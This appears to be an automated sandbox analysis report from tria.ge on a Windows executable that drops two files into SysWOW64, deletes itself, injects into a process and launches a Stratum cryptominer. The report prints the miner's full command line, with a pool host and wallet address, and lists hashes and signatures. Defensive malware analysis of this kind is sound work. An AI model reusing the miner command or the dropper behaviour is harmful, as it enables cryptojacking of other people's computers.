Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
139s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
12/06/2022, 20:14 UTC
Static task
static1
Behavioral task
behavioral1
Sample
1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe
Resource
win7-20220414-en
General
-
Target
1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe
-
Size
4.7MB
-
MD5
f5479f77d2bee7461763a19bdeffac80
-
SHA1
4d98de66484a9f1461d22bd51ddec7d0883022a4
-
SHA256
1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
-
SHA512
3b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
Malware Config
Signatures
-
Detected Stratum cryptominer command 1 IoCs
Looks to be attempting to contact Stratum mining pool.
pid Process 2004 U30KcO.exe -
Executes dropped EXE 2 IoCs
pid Process 1420 rwM7nS.exe 2004 U30KcO.exe -
resource yara_rule behavioral1/files/0x000a0000000122ca-62.dat upx behavioral1/memory/2004-63-0x0000000000400000-0x00000000018FF000-memory.dmp upx -
Deletes itself 1 IoCs
pid Process 1420 rwM7nS.exe -
Loads dropped DLL 2 IoCs
pid Process 916 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe 916 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\rwM7nS.exe 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe File opened for modification C:\Windows\SysWOW64\rwM7nS.exe 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe File created C:\Windows\SysWOW64\U30KcO.exe rwM7nS.exe File opened for modification C:\Windows\SysWOW64\U30KcO.exe rwM7nS.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe 1420 rwM7nS.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1420 rwM7nS.exe Token: SeDebugPrivilege 1420 rwM7nS.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 916 wrote to memory of 1420 916 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe 27 PID 916 wrote to memory of 1420 916 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe 27 PID 916 wrote to memory of 1420 916 1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe 27 PID 1420 wrote to memory of 2004 1420 rwM7nS.exe 29 PID 1420 wrote to memory of 2004 1420 rwM7nS.exe 29 PID 1420 wrote to memory of 2004 1420 rwM7nS.exe 29 PID 1420 wrote to memory of 2004 1420 rwM7nS.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe"C:\Users\Admin\AppData\Local\Temp\1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\SysWOW64\rwM7nS.exe"C:\Windows\SysWOW64\rwM7nS.exe" 916 |||C:\Users\Admin\AppData\Local\Temp\1eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0.exe|||2⤵
- Executes dropped EXE
- Deletes itself
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\SysWOW64\U30KcO.exe"C:\Windows\SysWOW64\U30KcO.exe" -a bcd -o stratum+tcp://abc.xsdong.com:9501 -u 14SUEcH7KpPB8emfB24xR754Car2bLZ5XQ.BCD -p x -i 123⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:2004
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.4MB
MD5db6b6d7a773d0608bdb6056b71ad6e5e
SHA159e0c3d36b97e3502b8fc8a34e55bc1531991e01
SHA25604817972c9f3222804fb1b82ddfce0eb90e957e722a1dbacb655aa954f564940
SHA51253a62ebf06de34ec182a5be733e91698a1c2ac8c006513e39a8921db0c52e88388fc416ffcbad76113296da3afbef7bc0addbe94e639a96f83ec0149518b22ae
-
Filesize
4.7MB
MD5f5479f77d2bee7461763a19bdeffac80
SHA14d98de66484a9f1461d22bd51ddec7d0883022a4
SHA2561eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
SHA5123b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
-
Filesize
4.7MB
MD5f5479f77d2bee7461763a19bdeffac80
SHA14d98de66484a9f1461d22bd51ddec7d0883022a4
SHA2561eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
SHA5123b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
-
Filesize
4.7MB
MD5f5479f77d2bee7461763a19bdeffac80
SHA14d98de66484a9f1461d22bd51ddec7d0883022a4
SHA2561eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
SHA5123b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef
-
Filesize
4.7MB
MD5f5479f77d2bee7461763a19bdeffac80
SHA14d98de66484a9f1461d22bd51ddec7d0883022a4
SHA2561eb4eaaac11a804bdbf36009b6a4fcca8331f4adbefd495c3afd2c1536eb13c0
SHA5123b9fa6393d32f793980e223c4351a3ea256cf93ad6aec43bdb90fed13a518e5cde54da507efac4b81c1e912cc8eb8cf666e1768c602dd069c71bff4f132675ef